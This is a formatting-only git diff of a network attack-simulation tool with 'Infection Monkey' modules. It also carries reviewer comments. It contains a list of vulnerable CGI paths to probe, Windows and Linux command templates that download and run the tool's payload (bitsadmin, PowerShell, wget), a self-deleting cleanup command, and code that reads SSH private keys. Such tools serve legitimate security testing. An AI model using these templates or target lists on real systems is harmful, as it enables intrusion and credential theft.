+ r'/cgi-bin/admin/admin.cgi', + r'/cgi-bin/admin.cgi', + r'/cgi-bin/admin/getparam.cgi', + r'/cgi-bin/adminhot.cgi', + r'/cgi-bin/admin.pl', + r'/cgi-bin/admin/setup.cgi', + r'/cgi-bin/adminwww.cgi', + r'/cgi-bin/af.cgi', + r'/cgi-bin/aglimpse.cgi', + r'/cgi-bin/alienform.cgi', + r'/cgi-bin/AnyBoard.cgi', + r'/cgi-bin/architext_query.cgi', + r'/cgi-bin/astrocam.cgi', + r'/cgi-bin/AT-admin.cgi', + r'/cgi-bin/AT-generate.cgi', + r'/cgi-bin/auction/auction.cgi', + r'/cgi-bin/auktion.cgi', + r'/cgi-bin/ax-admin.cgi', + r'/cgi-bin/ax.cgi', + r'/cgi-bin/axs.cgi', + r'/cgi-bin/badmin.cgi', + r'/cgi-bin/banner.cgi', + r'/cgi-bin/bannereditor.cgi', + r'/cgi-bin/bb-ack.sh', + r'/cgi-bin/bb-histlog.sh', + r'/cgi-bin/bb-hist.sh', + r'/cgi-bin/bb-hostsvc.sh', + r'/cgi-bin/bb-replog.sh', + r'/cgi-bin/bb-rep.sh', + r'/cgi-bin/bbs_forum.cgi', + r'/cgi-bin/bigconf.cgi', + r'/cgi-bin/bizdb1-search.cgi', + r'/cgi-bin/blog/mt-check.cgi', + r'/cgi-bin/blog/mt-load.cgi', + r'/cgi-bin/bnbform.cgi', + r'/cgi-bin/book.cgi', + r'/cgi-bin/boozt/admin/index.cgi', + r'/cgi-bin/bsguest.cgi', + r'/cgi-bin/bslist.cgi', + r'/cgi-bin/build.cgi', + r'/cgi-bin/bulk/bulk.cgi', + r'/cgi-bin/cached_feed.cgi', + r'/cgi-bin/cachemgr.cgi', + r'/cgi-bin/calendar/index.cgi', + r'/cgi-bin/cartmanager.cgi', + r'/cgi-bin/cbmc/forums.cgi', + r'/cgi-bin/ccvsblame.cgi', + r'/cgi-bin/c_download.cgi', + r'/cgi-bin/cgforum.cgi', + r'/cgi-bin/.cgi', + r'/cgi-bin/cgi_process', + r'/cgi-bin/classified.cgi', + r'/cgi-bin/classifieds.cgi', + r'/cgi-bin/classifieds/classifieds.cgi', + r'/cgi-bin/classifieds/index.cgi', + r'/cgi-bin/.cobalt/alert/service.cgi', + r'/cgi-bin/.cobalt/message/message.cgi', + r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', + r'/cgi-bin/commandit.cgi', + r'/cgi-bin/commerce.cgi', + r'/cgi-bin/common/listrec.pl', + r'/cgi-bin/compatible.cgi', + r'/cgi-bin/Count.cgi', + r'/cgi-bin/csChatRBox.cgi', + r'/cgi-bin/csGuestBook.cgi', + r'/cgi-bin/csLiveSupport.cgi', + r'/cgi-bin/CSMailto.cgi', + 
r'/cgi-bin/CSMailto/CSMailto.cgi', + r'/cgi-bin/csNews.cgi', + r'/cgi-bin/csNewsPro.cgi', + r'/cgi-bin/csPassword.cgi', + r'/cgi-bin/csPassword/csPassword.cgi', + r'/cgi-bin/csSearch.cgi', + r'/cgi-bin/csv_db.cgi', + r'/cgi-bin/cvsblame.cgi', + r'/cgi-bin/cvslog.cgi', + r'/cgi-bin/cvsquery.cgi', + r'/cgi-bin/cvsqueryform.cgi', + r'/cgi-bin/day5datacopier.cgi', + r'/cgi-bin/day5datanotifier.cgi', + r'/cgi-bin/db_manager.cgi', + r'/cgi-bin/dbman/db.cgi', + r'/cgi-bin/dcforum.cgi', + r'/cgi-bin/dcshop.cgi', + r'/cgi-bin/dfire.cgi', + r'/cgi-bin/diagnose.cgi', + r'/cgi-bin/dig.cgi', + r'/cgi-bin/directorypro.cgi', + r'/cgi-bin/download.cgi', + r'/cgi-bin/e87_Ba79yo87.cgi', + r'/cgi-bin/emu/html/emumail.cgi', + r'/cgi-bin/emumail.cgi', + r'/cgi-bin/emumail/emumail.cgi', + r'/cgi-bin/enter.cgi', + r'/cgi-bin/environ.cgi', + r'/cgi-bin/ezadmin.cgi', + r'/cgi-bin/ezboard.cgi', + r'/cgi-bin/ezman.cgi', + r'/cgi-bin/ezshopper2/loadpage.cgi', + r'/cgi-bin/ezshopper3/loadpage.cgi', + r'/cgi-bin/ezshopper/loadpage.cgi', + r'/cgi-bin/ezshopper/search.cgi', + r'/cgi-bin/faqmanager.cgi', + r'/cgi-bin/FileSeek2.cgi', + r'/cgi-bin/FileSeek.cgi', + r'/cgi-bin/finger.cgi', + r'/cgi-bin/flexform.cgi', + r'/cgi-bin/fom.cgi', + r'/cgi-bin/fom/fom.cgi', + r'/cgi-bin/FormHandler.cgi', + r'/cgi-bin/FormMail.cgi', + r'/cgi-bin/gbadmin.cgi', + r'/cgi-bin/gbook/gbook.cgi', + r'/cgi-bin/generate.cgi', + r'/cgi-bin/getdoc.cgi', + r'/cgi-bin/gH.cgi', + r'/cgi-bin/gm-authors.cgi', + r'/cgi-bin/gm.cgi', + r'/cgi-bin/gm-cplog.cgi', + r'/cgi-bin/guestbook.cgi', + r'/cgi-bin/handler', + r'/cgi-bin/handler.cgi', + r'/cgi-bin/handler/netsonar', + r'/cgi-bin/hitview.cgi', + r'/cgi-bin/hsx.cgi', + r'/cgi-bin/html2chtml.cgi', + r'/cgi-bin/html2wml.cgi', + r'/cgi-bin/htsearch.cgi', + r'/cgi-bin/hw.sh', # testing + r'/cgi-bin/icat', + r'/cgi-bin/if/admin/nph-build.cgi', + r'/cgi-bin/ikonboard/help.cgi', + r'/cgi-bin/ImageFolio/admin/admin.cgi', + r'/cgi-bin/imageFolio.cgi', + r'/cgi-bin/index.cgi', + 
r'/cgi-bin/infosrch.cgi',
+ r'/cgi-bin/jammail.pl',
+ r'/cgi-bin/journal.cgi',
+ r'/cgi-bin/lastlines.cgi',
+ r'/cgi-bin/loadpage.cgi',
+ r'/cgi-bin/login.cgi',
+ r'/cgi-bin/logit.cgi',
+ r'/cgi-bin/log-reader.cgi',
+ r'/cgi-bin/lookwho.cgi',
+ r'/cgi-bin/lwgate.cgi',
+ r'/cgi-bin/MachineInfo',
+ r'/cgi-bin/MachineInfo',
+ r'/cgi-bin/magiccard.cgi',
+ r'/cgi-bin/mail/emumail.cgi',
+ r'/cgi-bin/maillist.cgi',
+ r'/cgi-bin/mailnews.cgi',
+ r'/cgi-bin/mail/nph-mr.cgi',
+ r'/cgi-bin/main.cgi',
+ r'/cgi-bin/main_menu.pl',
+ r'/cgi-bin/man.sh',
+ r'/cgi-bin/mini_logger.cgi',
+ r'/cgi-bin/mmstdod.cgi',
+ r'/cgi-bin/moin.cgi',
+ r'/cgi-bin/mojo/mojo.cgi',
+ r'/cgi-bin/mrtg.cgi',
+ r'/cgi-bin/mt.cgi',
+ r'/cgi-bin/mt/mt.cgi',
+ r'/cgi-bin/mt/mt-check.cgi',
+ r'/cgi-bin/mt/mt-load.cgi',
+ r'/cgi-bin/mt-static/mt-check.cgi',
+ r'/cgi-bin/mt-static/mt-load.cgi',
+ r'/cgi-bin/musicqueue.cgi',
+ r'/cgi-bin/myguestbook.cgi',
+ r'/cgi-bin/.namazu.cgi',
+ r'/cgi-bin/nbmember.cgi',
+ r'/cgi-bin/netauth.cgi',
+ r'/cgi-bin/netpad.cgi',
+ r'/cgi-bin/newsdesk.cgi',
+ r'/cgi-bin/nlog-smb.cgi',
+ r'/cgi-bin/nph-emumail.cgi',
+ r'/cgi-bin/nph-exploitscanget.cgi',
+ r'/cgi-bin/nph-publish.cgi',
+ r'/cgi-bin/nph-test.cgi',
+ r'/cgi-bin/pagelog.cgi',
+ r'/cgi-bin/pbcgi.cgi',
+ r'/cgi-bin/perlshop.cgi',
+ r'/cgi-bin/pfdispaly.cgi',
+ r'/cgi-bin/pfdisplay.cgi',
+ r'/cgi-bin/phf.cgi',
+ r'/cgi-bin/photo/manage.cgi',
+ r'/cgi-bin/photo/protected/manage.cgi',
+ r'/cgi-bin/php-cgi',
+ r'/cgi-bin/php.cgi',
+ r'/cgi-bin/php.fcgi',
+ r'/cgi-bin/ping.sh',
+ r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi',
+ r'/cgi-bin/pollssi.cgi',
+ r'/cgi-bin/postcards.cgi',
+ r'/cgi-bin/powerup/r.cgi',
+ r'/cgi-bin/printenv',
+ r'/cgi-bin/probecontrol.cgi',
+ r'/cgi-bin/profile.cgi',
+ r'/cgi-bin/publisher/search.cgi',
+ r'/cgi-bin/quickstore.cgi',
+ r'/cgi-bin/quizme.cgi',
+ r'/cgi-bin/ratlog.cgi',
+ r'/cgi-bin/r.cgi',
+ r'/cgi-bin/register.cgi',
+ r'/cgi-bin/replicator/webpage.cgi/',
+ r'/cgi-bin/responder.cgi',
+ r'/cgi-bin/robadmin.cgi',
+ r'/cgi-bin/robpoll.cgi',
+ r'/cgi-bin/rtpd.cgi',
+ r'/cgi-bin/sbcgi/sitebuilder.cgi',
+ r'/cgi-bin/scoadminreg.cgi',
+ r'/cgi-bin-sdb/printenv',
+ r'/cgi-bin/sdbsearch.cgi',
+ r'/cgi-bin/search',
+ r'/cgi-bin/search.cgi',
+ r'/cgi-bin/search/search.cgi',
+ r'/cgi-bin/sendform.cgi',
+ r'/cgi-bin/shop.cgi',
+ r'/cgi-bin/shopper.cgi',
+ r'/cgi-bin/shopplus.cgi',
+ r'/cgi-bin/showcheckins.cgi',
+ r'/cgi-bin/simplestguest.cgi',
+ r'/cgi-bin/simplestmail.cgi',
+ r'/cgi-bin/smartsearch.cgi',
+ r'/cgi-bin/smartsearch/smartsearch.cgi',
+ r'/cgi-bin/snorkerz.bat',
+ r'/cgi-bin/snorkerz.bat',
+ r'/cgi-bin/snorkerz.cmd',
+ r'/cgi-bin/snorkerz.cmd',
+ r'/cgi-bin/sojourn.cgi',
+ r'/cgi-bin/spin_client.cgi',
+ r'/cgi-bin/start.cgi',
+ r'/cgi-bin/status',
+ r'/cgi-bin/status_cgi',
+ r'/cgi-bin/store/agora.cgi',
+ r'/cgi-bin/store.cgi',
+ r'/cgi-bin/store/index.cgi',
+ r'/cgi-bin/survey.cgi',
+ r'/cgi-bin/sync.cgi',
+ r'/cgi-bin/talkback.cgi',
+ r'/cgi-bin/technote/main.cgi',
+ r'/cgi-bin/test2.pl',
+ r'/cgi-bin/test-cgi',
+ r'/cgi-bin/test.cgi',
+ r'/cgi-bin/testing_whatever',
+ r'/cgi-bin/test/test.cgi',
+ r'/cgi-bin/tidfinder.cgi',
+ r'/cgi-bin/tigvote.cgi',
+ r'/cgi-bin/title.cgi',
+ r'/cgi-bin/top.cgi',
+ r'/cgi-bin/traffic.cgi',
+ r'/cgi-bin/troops.cgi',
+ r'/cgi-bin/ttawebtop.cgi/',
+ r'/cgi-bin/ultraboard.cgi',
+ r'/cgi-bin/upload.cgi',
+ r'/cgi-bin/urlcount.cgi',
+ r'/cgi-bin/viewcvs.cgi',
+ r'/cgi-bin/view_help.cgi',
+ r'/cgi-bin/viralator.cgi',
+ r'/cgi-bin/virgil.cgi',
+ r'/cgi-bin/vote.cgi',
+ r'/cgi-bin/vpasswd.cgi',
+ r'/cgi-bin/way-board.cgi',
+ r'/cgi-bin/way-board/way-board.cgi',
+ r'/cgi-bin/webbbs.cgi',
+ r'/cgi-bin/webcart/webcart.cgi',
+ r'/cgi-bin/webdist.cgi',
+ r'/cgi-bin/webif.cgi',
+ r'/cgi-bin/webmail/html/emumail.cgi',
+ r'/cgi-bin/webmap.cgi',
+ r'/cgi-bin/webspirs.cgi',
+ r'/cgi-bin/Web_Store/web_store.cgi',
+ r'/cgi-bin/whois.cgi',
+ r'/cgi-bin/whois_raw.cgi',
+ r'/cgi-bin/whois/whois.cgi',
+ r'/cgi-bin/wrap',
+ r'/cgi-bin/wrap.cgi',
+ r'/cgi-bin/wwwboard.cgi.cgi',
+ r'/cgi-bin/YaBB/YaBB.cgi',
+ r'/cgi-bin/zml.cgi',
+ r'/cgi-mod/index.cgi',
+ r'/cgis/wwwboard/wwwboard.cgi',
+ r'/cgi-sys/addalink.cgi',
+ r'/cgi-sys/defaultwebpage.cgi',
+ r'/cgi-sys/domainredirect.cgi',
+ r'/cgi-sys/entropybanner.cgi',
+ r'/cgi-sys/entropysearch.cgi',
+ r'/cgi-sys/FormMail-clone.cgi',
+ r'/cgi-sys/helpdesk.cgi',
+ r'/cgi-sys/mchat.cgi',
+ r'/cgi-sys/randhtml.cgi',
+ r'/cgi-sys/realhelpdesk.cgi',
+ r'/cgi-sys/realsignup.cgi',
+ r'/cgi-sys/signup.cgi',
+ r'/connector.cgi',
+ r'/cp/rac/nsManager.cgi',
+ r'/create_release.sh',
+ r'/CSNews.cgi',
+ r'/csPassword.cgi',
+ r'/dcadmin.cgi',
+ r'/dcboard.cgi',
+ r'/dcforum.cgi',
+ r'/dcforum/dcforum.cgi',
+ r'/debuff.cgi',
+ r'/debug.cgi',
+ r'/details.cgi',
+ r'/edittag/edittag.cgi',
+ r'/emumail.cgi',
+ r'/enter_buff.cgi',
+ r'/enter_bug.cgi',
+ r'/ez2000/ezadmin.cgi',
+ r'/ez2000/ezboard.cgi',
+ r'/ez2000/ezman.cgi',
+ r'/fcgi-bin/echo',
+ r'/fcgi-bin/echo',
+ r'/fcgi-bin/echo2',
+ r'/fcgi-bin/echo2',
+ r'/Gozila.cgi',
+ r'/hitmatic/analyse.cgi',
+ r'/hp_docs/cgi-bin/index.cgi',
+ r'/html/cgi-bin/cgicso',
+ r'/html/cgi-bin/cgicso',
+ r'/index.cgi',
+ r'/info.cgi',
+ r'/infosrch.cgi',
+ r'/login.cgi',
+ r'/mailview.cgi',
+ r'/main.cgi',
+ r'/megabook/admin.cgi',
+ r'/ministats/admin.cgi',
+ r'/mods/apage/apage.cgi',
+ r'/_mt/mt.cgi',
+ r'/musicqueue.cgi',
+ r'/ncbook.cgi',
+ r'/newpro.cgi',
+ r'/newsletter.sh',
+ r'/oem_webstage/cgi-bin/oemapp_cgi',
+ r'/page.cgi',
+ r'/parse_xml.cgi',
+ r'/photodata/manage.cgi',
+ r'/photo/manage.cgi',
+ r'/print.cgi',
+ r'/process_buff.cgi',
+ r'/process_bug.cgi',
+ r'/pub/english.cgi',
+ r'/quikmail/nph-emumail.cgi',
+ r'/quikstore.cgi',
+ r'/reviews/newpro.cgi',
+ r'/ROADS/cgi-bin/search.pl',
+ r'/sample01.cgi',
+ r'/sample02.cgi',
+ r'/sample03.cgi',
+ r'/sample04.cgi',
+ r'/sampleposteddata.cgi',
+ r'/scancfg.cgi',
+ r'/scancfg.cgi',
+ r'/servers/link.cgi',
+ r'/setpasswd.cgi',
+ r'/SetSecurity.shm',
+
r'/shop/member_html.cgi', + r'/shop/normal_html.cgi', + r'/site_searcher.cgi', + r'/siteUserMod.cgi', + r'/submit.cgi', + r'/technote/print.cgi', + r'/template.cgi', + r'/test.cgi', + r'/ucsm/isSamInstalled.cgi', + r'/upload.cgi', + r'/userreg.cgi', + r'/users/scripts/submit.cgi', + r'/vood/cgi-bin/vood_view.cgi', + r'/Web_Store/web_store.cgi', + r'/webtools/bonsai/ccvsblame.cgi', + r'/webtools/bonsai/cvsblame.cgi', + r'/webtools/bonsai/cvslog.cgi', + r'/webtools/bonsai/cvsquery.cgi', + r'/webtools/bonsai/cvsqueryform.cgi', + r'/webtools/bonsai/showcheckins.cgi', + r'/wwwadmin.cgi', + r'/wwwboard.cgi', + r'/wwwboard/wwwboard.cgi' +) diff --git a/monkey/infection_monkey/exploit/struts2.py b/monkey/infection_monkey/exploit/struts2.py index fc2fd764d..9aba749a7 100644 --- a/monkey/infection_monkey/exploit/struts2.py +++ b/monkey/infection_monkey/exploit/struts2.py @@ -3,13 +3,14 @@ code used is from https://www.exploit-db.com/exploits/41570/ Vulnerable struts2 versions <=2.3.31 and <=2.5.10 """ -import urllib.request, urllib.error, urllib.parse import http.client -import unicodedata +import logging import re import ssl +import urllib.error +import urllib.parse +import urllib.request -import logging from infection_monkey.exploit.web_rce import WebRCE __author__ = "VakarisZ" diff --git a/monkey/infection_monkey/exploit/tools/http_tools.py b/monkey/infection_monkey/exploit/tools/http_tools.py index 297e064fc..b31e67137 100644 --- a/monkey/infection_monkey/exploit/tools/http_tools.py +++ b/monkey/infection_monkey/exploit/tools/http_tools.py 
@@ -1,14 +1,16 @@ import logging import os import os.path -import urllib.request, urllib.parse, urllib.error +import urllib.error +import urllib.parse +import urllib.request from threading import Lock +from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target +from infection_monkey.model import DOWNLOAD_TIMEOUT from infection_monkey.network.firewall import app as firewall from infection_monkey.network.info import get_free_tcp_port from infection_monkey.transport import HTTPServer, LockedHTTPServer -from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target -from infection_monkey.model import DOWNLOAD_TIMEOUT __author__ = 'itamar' diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py index a1da97efe..257cfd469 100644 --- a/monkey/infection_monkey/exploit/wmiexec.py +++ b/monkey/infection_monkey/exploit/wmiexec.py @@ -39,7 +39,8 @@ class WmiExploiter(HostExploiter): password_hashed = self._config.hash_sensitive_data(password) lm_hash_hashed = self._config.hash_sensitive_data(lm_hash) mtlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash) - creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): ({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed) + creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): " \ + "({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed) LOG.debug(("Attempting to connect %r using WMI with " % self.host) + creds_for_logging) wmi_connection = WmiTools.WmiConnection() diff --git a/monkey/infection_monkey/main.py b/monkey/infection_monkey/main.py index 88b7f9fd9..928425535 100644 --- a/monkey/infection_monkey/main.py +++ b/monkey/infection_monkey/main.py @@ -1,5 +1,3 @@ - - import argparse import json import logging 
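Review bot: The re-wrapped `creds_for_logging` literal in the wmiexec.py hunk relies on a backslash continuation plus implicit string concatenation, which silently turns into a dangling expression if a later edit drops the backslash; wrapping both literals in parentheses, `creds_for_logging = ("user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): " "({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed))`, keeps the concatenation explicit. Separately, the adjacent `LOG.debug` line still writes digests of the password and of both NTLM/LM hashes to the log at every connection attempt; if `hash_sensitive_data` is an unsalted SHA-512 (its body is not visible here), a low-entropy password remains recoverable from the log by offline guessing, so a truncated digest or a keyed HMAC would be a safer log fingerprint. The enclosing method of `WmiExploiter` starts and ends outside the hunk.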
@@ -23,8 +21,11 @@ LOG = None LOG_CONFIG = {'version': 1, 'disable_existing_loggers': False, - 'formatters': {'standard': { - 'format': '%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s'}, + 'formatters': { + 'standard': { + 'format': + '%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s' + }, }, 'handlers': {'console': {'class': 'logging.StreamHandler', 'level': 'DEBUG', diff --git a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py index 3e333a26d..254bce966 100644 --- a/monkey/infection_monkey/model/__init__.py +++ b/monkey/infection_monkey/model/__init__.py 
@@ -11,11 +11,14 @@ MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, ) GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)' DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) -MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, ) -DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1' +MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \ + '/c %%(monkey_path)s %s"' % (MONKEY_ARG, ) +DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \ + 'file_path)s exit)) > NUL 2>&1 ' # Commands used for downloading monkeys -POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\"" +POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \ + "monkey_path)s\' -UseBasicParsing\" " WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s" BITSADMIN_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' CHMOD_MONKEY = "chmod +x %(monkey_path)s" diff --git a/monkey/infection_monkey/monkeyfs.py b/monkey/infection_monkey/monkeyfs.py index c5ddef1aa..b65443c76 100644 --- a/monkey/infection_monkey/monkeyfs.py +++ b/monkey/infection_monkey/monkeyfs.py @@ -34,7 +34,6 @@ class VirtualFile(BytesIO): return path in VirtualFile._vfs - def getsize(path): if path.startswith(MONKEYFS_PREFIX): return VirtualFile.getsize(path) 
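Review bot: The re-wrapped `DELAY_DELETE_CMD` and `POWERSHELL_HTTP_UPLOAD` literals in the model/__init__.py hunk now end with a trailing space (`... > NUL 2>&1 '` and `... -UseBasicParsing\" "`), so a formatting-only commit changes the command strings that are handed to the remote shell; drop the trailing space from both closing literals. Splitting the `%(file_path)s` and `%(monkey_path)s` placeholders across two literals (`%(' \ 'file_path)s`, `'%(" "monkey_path)s'`) keeps them intact only through concatenation and makes them easy to break on the next edit; break the lines at a space instead, e.g. `'... & if not exist ' \ '%(file_path)s exit)) > NUL 2>&1'`. `MONKEY_CMDLINE_HTTP` is split in the same style but its bytes are unchanged.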
diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py index 16af673b1..06d98dcbd 100644 --- a/monkey/infection_monkey/network/firewall.py +++ b/monkey/infection_monkey/network/firewall.py @@ -8,6 +8,7 @@ def _run_netsh_cmd(command, args): if value])), stdout=subprocess.PIPE) return cmd.stdout.read().strip().lower().endswith('ok.') + class FirewallApp(object): def is_enabled(self, **kwargs): return False @@ -83,9 +84,9 @@ class WinAdvFirewall(FirewallApp): for rule in list(self._rules.values()): if rule.get('program') == sys.executable and \ - 'in' == rule.get('dir') and \ - 'allow' == rule.get('action') and \ - 4 == len(list(rule.keys())): + 'in' == rule.get('dir') and \ + 'allow' == rule.get('action') and \ + 4 == len(list(rule.keys())): return True return False diff --git a/monkey/infection_monkey/network/httpfinger.py b/monkey/infection_monkey/network/httpfinger.py index 30292d99f..935d397d9 100644 --- a/monkey/infection_monkey/network/httpfinger.py +++ b/monkey/infection_monkey/network/httpfinger.py @@ -39,7 +39,7 @@ class HTTPFinger(HostFinger): ssl = True if 'https://' in url else False self.init_service(host.services, ('tcp-' + port[1]), port[0]) host.services['tcp-' + port[1]]['name'] = 'http' - host.services['tcp-' + port[1]]['data'] = (server,ssl) + host.services['tcp-' + port[1]]['data'] = (server, ssl) LOG.info("Port %d is open on host %s " % (port[0], host)) break # https will be the same on the same port except Timeout: diff --git a/monkey/infection_monkey/network/ping_scanner.py b/monkey/infection_monkey/network/ping_scanner.py index bf215168e..b76db8ad3 100644 --- a/monkey/infection_monkey/network/ping_scanner.py +++ b/monkey/infection_monkey/network/ping_scanner.py @@ -20,7 +20,6 @@ LOG = logging.getLogger(__name__) class PingScanner(HostScanner, HostFinger): - _SCANNED_SERVICE = '' def __init__(self): 
@@ -49,14 +48,12 @@ class PingScanner(HostScanner, HostFinger): if not "win32" == sys.platform: timeout /= 1000 - sub_proc = subprocess.Popen(["ping", - PING_COUNT_FLAG, - "1", - PING_TIMEOUT_FLAG, - str(timeout), host.ip_addr], - stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - text=True) + sub_proc = subprocess.Popen( + ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr], + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + text=True + ) output = " ".join(sub_proc.communicate()) regex_result = self._ttl_regex.search(output) diff --git a/monkey/infection_monkey/network/smbfinger.py b/monkey/infection_monkey/network/smbfinger.py index 8a267e9d1..7224e032c 100644 --- a/monkey/infection_monkey/network/smbfinger.py +++ b/monkey/infection_monkey/network/smbfinger.py @@ -30,7 +30,7 @@ class Packet: return b"".join(content_list) -##### SMB Packets ##### +# SMB Packets class SMBHeader(Packet): fields = odict([ ("proto", b"\xff\x53\x4d\x42"), 
@@ -92,7 +92,13 @@ class SMBSessionFingerData(Packet): ("capabilities", b"\xd4\x00\x00\xa0"), ("bcc1", ""), ("Data", - b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"), + b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02" + b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f" + b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63" + b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00" + b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35" + b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00"), ]) diff --git a/monkey/infection_monkey/network/tcp_scanner.py b/monkey/infection_monkey/network/tcp_scanner.py index 2ea88842f..fa2d812ae 100644 --- a/monkey/infection_monkey/network/tcp_scanner.py +++ b/monkey/infection_monkey/network/tcp_scanner.py 
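Review bot: The re-wrapped `Data` literal in the smbfinger.py hunk carries no comment, so a reader cannot tell whether the seven pieces still form one well-formed blob; comparing them against the removed line, the 177 bytes are identical, but the split points fall mid-structure and a lost `\x00` would go unnoticed. A comment above the field such as `# SPNEGO negTokenInit carrying an NTLMSSP NEGOTIATE (type 1) token, followed by the UTF-16LE native OS / LAN Manager strings "Windows 2002 Service Pack 3 2600" and "Windows 2002 5.1"` would record what is being preserved, and a length check next to the class, e.g. `assert len(SMBSessionFingerData.fields['Data']) == 177`, would catch a dropped byte on the next re-wrap (presumably `fields` is an `odict` here as in `SMBHeader`; its opening line is outside the hunk).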
@@ -25,7 +25,8 @@ class TcpScanner(HostScanner, HostFinger): Scans a target host to see if it's alive using the tcp_target_ports specified in the configuration. :param host: VictimHost structure :param only_one_port: Currently unused. - :return: T/F if there is at least one open port. In addition, the host object is updated to mark those services as alive. + :return: T/F if there is at least one open port. + In addition, the host object is updated to mark those services as alive. """ # maybe hide under really bad detection systems diff --git a/monkey/infection_monkey/system_info/SSH_info_collector.py b/monkey/infection_monkey/system_info/SSH_info_collector.py index 60c509fc6..31afdb8ed 100644 --- a/monkey/infection_monkey/system_info/SSH_info_collector.py +++ b/monkey/infection_monkey/system_info/SSH_info_collector.py @@ -63,7 +63,7 @@ class SSHCollector(object): LOG.info("Found public key in %s" % public) try: with open(public) as f: - info['public_key'] = f.read() + info['public_key'] = f.read() # By default private key has the same name as public, only without .pub private = os.path.splitext(public)[0] if os.path.exists(private): diff --git a/monkey/infection_monkey/transport/base.py b/monkey/infection_monkey/transport/base.py index e6a5bc366..a02d86708 100644 --- a/monkey/infection_monkey/transport/base.py +++ b/monkey/infection_monkey/transport/base.py @@ -27,4 +27,4 @@ def update_last_serve_time(): def get_last_serve_time(): global g_last_served - return g_last_served \ No newline at end of file + return g_last_served diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 472c5770b..a7f6f90da 100644 --- 